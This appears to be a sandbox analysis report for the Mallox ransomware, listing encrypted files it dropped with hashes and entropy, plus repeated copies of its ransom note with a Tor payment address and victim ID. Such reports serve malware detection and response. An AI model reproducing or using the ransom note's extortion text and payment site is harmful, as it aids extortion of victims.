                    Preview:...ek...c..:.....o...&.x4.f6}.{Q...]XB021..s.....4G...?...f...%...u.c..\.9.a...ZJ..d....f{...d:/.M*....<...<..k..).E..$+V....6...@Ip...@G.E&.....1Q..|...q....2...S..6{[... SX.....G.)q....M..!.......&...>..6.....I....7kx..../.y......T..+.4B....#...C.,..V+.G.&l..5..,. ..`.9fBd.ao.....~..b1...z&.h2.......n...e.AGt=U.o<dPJ.......qs.....s.?t.....D......u.. ....iv..:...........\R%E.........*.Q./j...e...6....V....W..=.}j..<...+.x.t...Os.?Q...../..LY.....(.Oe(....J.x.>.|.h.yg.q..U..h.R......D....O.........D.N{.............v.Y..d.G.,....G..:...@.9j...Y..=.5.wh..7p!.]...b..s.\.n....u...f.^oBh.....[.Tm.K.....X...10.J..0.....q.k_}.<._....Q*g.VL!.D..5@.)lJ.}f.I?j^....B1.U..z.!.1^..u.`.S..(......;..}.&8.S.}..gY..iE..]..8.8=.h.......?.....km0.....J...v...F.K.E.W...[...]...(.?t.5.P...S.YZ.5+..v;.AV....Q5.J.4.l3..q.X.(Q.cV..U....9...)...-.i.F..5...#:.7...vT..'...b.mk3.........+UB....L...[...Tu.;M.p..m......R.l....G0.Fs.O..c..0.9.n.!F.7.

                    C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\vendor.js.gz.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):243314
                    Entropy (8bit):7.999155017097274
                    Encrypted:true
                    SSDEEP:6144:0yonZiJqET3pfuegMaYlQg8QOlbSetdHLA23Vx:wnwJ31HRDQbSetdH/3Vx
                    MD5:64415060E5C045F1484A3D127BE9A571
                    SHA1:1B2B8E9AB0BBA438E0BFB7E9C1B5A338D6CFA5CA
                    SHA-256:FE45E7E97E0529EA131038D52A38D2A6CFD3A907AA6F2530C4470B9CDE25F850
                    SHA-512:AC5FA0F22497D0913BB9DCA73BCAEBBE7CDACA5F4F8763F0D412DC95165FDAC463E332D03C783F896333BDF5BB0A49468970FCEE5B82DE0E44928B1CA938B104
                    Malicious:true
                    Preview:..36..6.++....(._.V.K.J....$....f...56S.f.T.0......4..1.....|r..o<...m........?.J.P:.c_.R.M...[.n..J.^6?q8...-...^....r*o.W*.Ev...R.b[....22%M'.F5.m.X./4..I.......L.......$...s.+].*..3M.>..1....."........;v/..y?.q3gn.`a5.J..88;.....q.3....f.F...OKw=.=....r......B.h...m..V".=*.xM....E~........t..?^.F.>.x...I...-.Mt.....3y~.~.oD.^..'...._...j.kK#.."W..Lzv.WA.....%.+B]..K..i.......}P.&..&..u .....hw....H......s...X.HS.@a.-.T23.g......~..C.X6.H..X..~X.\.+.......Z...&....f|/.).}....y ..>.g..?9."..}..!.G9LD.|.!sv.P4:.;..h........P.}jy..s.|.&.....!..7.....L...o^.o..Y..+...|..G.NW............N:T..+/o;&q$h...K,.Q.D.......]..#.XFQ.d..."(.(8.gd.s...89..D.J,.J...3.u}8.{.]..Y......>.h.J!...oK=..t....xY..-.g&w3...a.gD...Om{.Aa..G....r.%%.0'.....~A.+..58k...g.:!E.W.G.Cf.X..d.C....[..[.Y.$.LE..2}.R:"..rTt-.X.#d.*.? ......_.{........PHl..us.'.Ba......"...'7&.....%....q..D7.m./..D...jq..n7uVX.F.^.1...#.)..4......~....h.MB.TNx...N..:L..m..rx...*B......

                    C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000051\dist\en-us_web\vendor.js.map.gz.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):811231
                    Entropy (8bit):7.999746169469016
                    Encrypted:true
                    SSDEEP:24576:o0A0yzHHv7qsIN9V0JsxjODdAqCZc/mJ2:o08zHv74zosjODiqCq+8
                    MD5:35F176EF07785FDE18A28A5791ADEEE6
                    SHA1:B5050B484D750E2889A9A52D1F5BAAEE595AD5E7
                    SHA-256:8E01A6BE244339F3C43368A14199BE9C514E6F2DD2DB7CE3FDE9B06A8E8A24F0
                    SHA-512:6DF4C109D216009C09AC37EBA191602F947F31E9E6316DED26048AD6FD5A16D5A13782F3E143CB5746A62B2485CEF856977B48B6401FAD097BCAB9D346CEDEC5
                    Malicious:true
                    Preview:..I........V.}.VfS..8...... .......f.A{..FC....\V...bz..trv..B.[..l}\.;l...C$..:..^..V..d._9.B..SK2>Q.!...B.........h.+..].M... f&.[.f.L.}...C..0WIa..}..j..8'8....Y.+.......C....W9....h...v..._m.<.A... a..>Pb...gZ.._....dJ.z.gW.4..^...(.ks..s.+.>2IP{.....)....(>.W....@..L.>En.J9.....sI....\....F..y.yj..>B.<....".y.V.Ar.h.S.?@.A.....E......5d2....lr1... .9i....n.|.= m`..gc..n3....$:w....."X"Hc..]b...Y9..#.....CIy)*.Y..M.1...n.`.....:..i..]....hs...+..y.c..I.]\ xV.5..'....gYn.u.e%H.B.]..2?. 6....9.t....L".+....>.Sx....W&.."(...[..*....r..Z.....y_..5Y.pT."~....M. .n.8..A.*.W....YH.../~.......'.+.1.......i........1.....Lz..Ic.r..".......A.W...Nv..p.*...3....K.Lk.....B2...?.Q(E..{.4.........4..%-(v..2T...A...~|P.....Q...e.T...*}. .q.....q.p9..E.pb.....BI'..!..+k.r.....c.....1.....r..h..0......^f..ST'0.......$. ..E...H.Q..QV.w..._.U..A.-.. .2.......{.s.....\ .".[...#S._s.............X"0...s...,...aI..h.2...].h.....u._.^v.W.....}*gOsK.eu..YC.

                    C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\dist\taskpane.js.gz.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):451885
                    Entropy (8bit):7.999530286202199
                    Encrypted:true
                    SSDEEP:12288:0GneWQOL1ufRNN0oO+2CNE48zxjOdR0U/y/Q6IfX8pIiBt:SnYCRNN0oO+2CNEbMdRba/RIUBBt
                    MD5:3B9E49481CF610AC126A3B590AA650BE
                    SHA1:4E394322975065C08E2EED852699909F59E02796
                    SHA-256:6FD4822D40019602BCCFF87D18B98D1F259480AA35652ADAFB1BB2417E28A8F0
                    SHA-512:125C5F11F2C3E358A3C9E51E68253AB4F6C34761B01B08097C31727CB9A4C0C60BE6BC11C1990431AA3B4CA3C31C4631BCF6ECFEBE9C05A77B8B837C9F57B450
                    Malicious:true
                    Preview:F..B....'...,.4mo..m.'T..h@S6.h .......~.....$..,UnX.<N.c.w.....bs8...F..KB...&.,...R.._..N....7.../..P....T........4U}....#..|..nr...........`.F...M...w+L...[.K..u...j....H.xF.....Ra..21.V..SQ....%.......g.zH..............7}..3Mg.f87e...2..O......<(.d..e [.r....yW.T..>t.S.ln.Q4..);...X$...]M..a.....x..>.5b....x..;f.*~d8....El.._"....T.....jLI8..X.A@..v.......M.......$.....(W..~.h.E.$.l.w}.*.ai:.n.....7..0...-..a.%-.!..e.D-CG....@....{,.k..dh...,...x.O.<YT.m.ct...&...tB.*K..KeI...NL..H...v..f..+...i5w........o......O,...*.T...5.G,.F.y...mG......G....6.-.b..............Q.x..l..).5].i^a..k...&......g....K...h...Z..'TQ.|..].b.?..'rM.. 4..3ux...M(L....E#&.D)By.%..53..%O_..JV ...0_.h....jlBN.JW]h......../.t...G'...E....=Y.wG..X..+1U....3*...bc.w......+b.......L.3z....U..... +.....Z.p.H.Gf......a.....U|.Kw.@...+..5v).3..{fx{...[..........T.I.....B-.N..\.D.6...$.....!.CQ.f....+.F.@..-9...-,.%.o.%I#..x.h..h..1~.Ss.A`:..E|..nR1...6Y$U.".."j.X..v.8

                    C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\dist\taskpane.js.map.gz.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1707100
                    Entropy (8bit):7.999885649641851
                    Encrypted:true
                    SSDEEP:49152:5I2TbTm1z8ejPb9lmNMhqgXBGAkDPRvHkYx/:1TYvPbfOPgXBGA+5HkE
                    MD5:F92A8674E3AEDF6EEACE074168C2DD14
                    SHA1:0F2EAA9DD9B77C8346EEFF566FD9157E590AFB1F
                    SHA-256:1E385AE5A11780E18FFB071401AADAB3E368DECC2FAA9E04877DA003626E3C4C
                    SHA-512:AC9D0DDFAAA8EF5100671E9923393A56CE9DF655E94FD86B3ED1C8E1BF88CBD8620AE5490F52D4225C7C5FC4CC8AF8CC3BD70DA51B021FFD5042F921CE3D0ED9
                    Malicious:true
                    Preview:M.R.........^..\..MX.....o~},k._.Z..A..n;..m/.>b..A.U..8W..1.hiW.9........L.........N7B.7&![.9-z....w9........w.....)P7n.".e.U>UD..(&#{...a.n@:...m.4.?..A..%&../;.r.5.r.b1y.~..y>.....v&...k......8..j..A..Pu...I...#.[.hk5r.y...;g......:.r.[..b....ba.A.h..ZL...9....mz"..!.h.....E*.gZV....j..z..,.k]..=l..v..,...HU.o(z@~.........<s...qE/.<~......S.Rp.......Zf.VUU...u|Y2t.n;....f..'.Y.P......>.q.......n....^@^....X.L.&...7.f^....9O...S..l.%... 7v..SYX{.E3.i...Q....D...0...]?.....{%k..\.}..G..,.M....;!.......l.i.*...{Ov.I..)..c@.....t.6.}...t:v~t...^,..|.%Wr....7.>.&..ZzE.....|x..0..d..R-H..5.f....M1E.|7S...\Y.6..e..opP...+(...@.!..x"...e..._.;...q=r(w.S.}.x..8.............G.........-...............g[[p.}.P3.Q...3{.dALO.]....]..._..E..I.p0.`.g..Q..5P....>.=.d....y.u..?..K.+..M......1.?.<...U.D..&.43*...".!.$}.+......7x7..r..=.~z'lm.02..*..&7.....@..I..&.d.c.?s0^g(.v..g."... ..=....G..`^u....k\.0<|7...mZ.....E.o....Uy..4.t....w.

                    C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\dist\vendor.js.gz.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):42600
                    Entropy (8bit):7.995598775268765
                    Encrypted:true
                    SSDEEP:768:fxeseAAL8rlpPQkn9WgSdPASvra+MY6gDrAi7GOBtm6bkze/2cSfJR8i53WDD:fgseAZZ4fdvCvgFG6jIS/2cQCixu
                    MD5:C75DECB7D9DC7A6C45140BC7B14D2A60
                    SHA1:3EA04FD5DC73AB715A194E026A5F0D07E8C89605
                    SHA-256:C3D2556EFCCF2066AE68339D9C8C8912408E54AAE127874CC44A1B2EE490CB55
                    SHA-512:CDA761C3BBDE2B2AAB1C12B84EC7A6C4F81A1C86019D7E5951710E3AD8B4230DCB397F6112D10089B6B63C384B0609E071C45FA401562E77137EA43B57D0D366
                    Malicious:true
                    Preview:@*...^.c....F+..!.zQ.:.|.......p*t.5A...V4.s.F.M..J.*M...b....('9.9$. ....tPj..q...t&....3..4...Q.....&3G6u....I.CZ....mz.i.L......{1``p.V..;._..\w'......4U..........1ys..}>.J....)q..vNR....m.s....Z.~%t..U..%vx.d..}..=."61...5B......=~K.N..c?9h{.A.{k....H..A.S.B?.=..."...H.=js.$..-.-....^.K._.hv..lA.K)cl..U....."..x..d.If#P..M=.l.o.."..h..G.$D.{T..O.0......^.8...z...n.H.q.+x...0.....!#...fa{B...t..G{..j{c.x1;..@H.j.9zT.9...:..N.."..X.m'..e....I|N.|.)....T..&..\n........'.S.!.nz..6_A:^..?"...u....q....8......`.tXm....>...M...f.B,<.'...!w...g?..-..e.}..>)...?:.............H..N.....yA!.."...1`........Ja.&m.C.`.U..../&...;PPB.V.uEK.E0...S..M55._....^..zh.v.IU...5...*.~.y.S.W=[~......i+...41bN?:.:+..r.o....>..C...~U....B..SnA...8..Yb..r........7...{F.T.]hd..&.....]<.x.J4.Z.NV1{G)....|..z+......d...B......&.cu..~..>q......@o..[.e...xJ8.o..0K8.<.BV....x.p^..`.p.W...........^..Lw.........B....~IG..}b.'.=...6...%.JO..B<..K..J.....*..3Z.A.P..".rD...'.....Z

                    C:\Program Files (x86)\microsoft office\root\Office16\sdxs\FA000000109\dist\vendor.js.map.gz.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):98826
                    Entropy (8bit):7.9983048800655325
                    Encrypted:true
                    SSDEEP:1536:idCLqxAl19iwVuB9/YaJfsRYErRGmANUDI/iZCaIr1ZA53ya59ziSMzPUseL6w:vqxO1gJBuaQRGdbKZVIr1ZUiOssb
                    MD5:2E71D31EAFCBB2DFFACF4D60024EEC00
                    SHA1:591CE98C3780E2410AFF1356E48B41DE87BF0E94
                    SHA-256:1C2D5D9CD9D622A458907E3DFE4739194B66B5DA8A2D3A5C7B713D7D821F2A9D
                    SHA-512:8CD28786E5E7879592E729B3C4C69ED7AF39B23D5E96C3EE53DF07B602E0479C1EBCD18FF8149FEB244A749718842EFECCCEB25F677B710769123D8AC60F533D
                    Malicious:true
                    Preview:.p_.r..u}.@.P_....x..<.......s.!..O..O..~.9.....*....y..iOH.uB..%d8....Z....p]...[.=0..r...VYU.'..rT..r......K.c.r../.......r.c..k;.j.],..O....3.T.......f.R..>..{+.A.a..^}.Z..#.zJq..uo..b%..........i.?.C....O1..z.....q.l,rS.D.~f..2..1,Nf..E>....zB&.....,h..d\..d.a......I.S..).K...MX....$k.]...I......!^.b...ty......s.W..T`...EX.{J...b.S..cF...J.uV..e.......U.cS.\....&.ni_.......s.<.6..o..@.,..xm.L.....:..*.f....Zk?.Q.`.t\hj`...C&U+W....Q...f.4......`....F#"@F.f.%..Gz"...14F"..k.V....X..x5..Wx.FH...G=....!\..r..H6.d.j....Z..a&.d5'2TU..l..:...tGo.J5......@L...0?.'{.P...~..#.}..../."..(..-......J.}..:.x.D...{..n|.........vS..;a...y3.3.V\.GD.X......p..*...t.S..m.L.~....g..M....LC....K.|/+%'........Q..E.c.I........b=z..=...a./.2..Ate.b.OQz...3s>...@..2......[.. ..Y....`O..H*.E.....qCE......`"'bp....I..H.....r......v.."..Y.v/&#t....P.}#.QDF...#.....K~..Jn.....k.zH.M.d..O.....z.'(....^...bW........9....OY#=o74CN4...Xgb/...?.WK..r;...O

                    C:\Program Files\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Reference Assemblies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Reference Assemblies\Microsoft\Framework\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Reference Assemblies\Microsoft\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files\Windows Defender Advanced Threat Protection\Classification\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
